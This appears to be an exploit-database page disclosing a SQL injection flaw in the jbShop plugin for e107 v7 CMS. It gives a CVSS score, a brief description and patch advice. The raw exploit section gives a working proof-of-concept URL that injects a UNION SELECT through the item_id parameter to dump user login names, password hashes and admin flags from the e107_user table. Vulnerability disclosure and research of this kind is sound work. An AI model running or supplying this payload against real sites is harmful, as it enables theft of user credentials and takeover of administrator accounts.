header-logo
Suggest Exploit
vendor:
e107 v7 CMS plugin
by:
Robert Cooper
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: e107 v7 CMS plugin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux/Windows 7
2020

jbShop – e107 v7 CMS plugin – SQL Injection vulnerability

A SQL Injection vulnerability exists in jbShop - e107 v7 CMS plugin, which allows an attacker to execute arbitrary SQL commands via the item_id parameter. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable server with a crafted item_id parameter. This will allow the attacker to gain access to sensitive information such as user credentials.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: jbShop - e107 v7 CMS plugin - SQL Injection vulnerability
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://sourceforge.net/projects/jbshop/
# Tested on: [Linux/Windows 7]
#Vulnerable Parameter:
 
item_id=

 
##############################################################
PoC:
 
http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--

 
##############################################################
www.websiteauditing.org
www.areyousecure.net
 
# Shouts to the Belegit crew